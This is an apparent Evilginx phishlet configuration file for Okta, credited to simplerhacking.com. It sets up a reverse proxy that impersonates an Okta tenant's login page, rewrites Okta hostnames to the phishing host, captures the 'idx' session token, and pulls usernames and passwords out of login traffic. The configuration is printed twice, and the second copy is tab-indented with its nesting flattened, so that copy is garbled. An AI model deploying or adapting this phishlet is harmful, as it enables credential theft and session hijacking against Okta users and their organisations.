simplerhacking/Okta-Phishlet.yaml

## Okta-Phishlet.yaml
name: 'Okta'
author: 'www.simplerhacking.com'
min_ver: '3.0.0'
proxy_hosts:
 - {phish_sub: 'okta-tenant-here', orig_sub: 'okta-tenant-here', domain: 'okta.com', session: true, is_landing: true, auto_filter: true}
sub_filters:
 - {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'okta-tenant-here.okta.com', replace: '{hostname}', mimes: ['application/ion+json']}
 - {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'https.*\.okta\.com', replace: 'https://{hostname}', mimes: ['text/html']}
auth_tokens:
 - domain: 'okta-tenant-here'
   keys: ['idx']
credentials:
 username:
   key: ''
   search: '"identifier":"([^"]*)'
   type: 'json'
 password:
   key: ''
   search: '"passcode":"([^"]*)'
   type: 'json'
login:
 domain: 'okta-tenant-here'
 path: '/login/login.htm'
	name: 'Okta'
	author: 'www.simplerhacking.com'
	min_ver: '3.0.0'
	proxy_hosts:
	- {phish_sub: 'okta-tenant-here', orig_sub: 'okta-tenant-here', domain: 'okta.com', session: true, is_landing: true, auto_filter: true}
	sub_filters:
	- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'okta-tenant-here.okta.com', replace: '{hostname}', mimes: ['application/ion+json']}
	- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'https.*\.okta\.com', replace: 'https://{hostname}', mimes: ['text/html']}
	auth_tokens:
	- domain: 'okta-tenant-here'
	keys: ['idx']
	credentials:
	username:
	key: ''
	search: '"identifier":"([^"]*)'
	type: 'json'
	password:
	key: ''
	search: '"passcode":"([^"]*)'
	type: 'json'
	login:
	domain: 'okta-tenant-here'
	path: '/login/login.htm'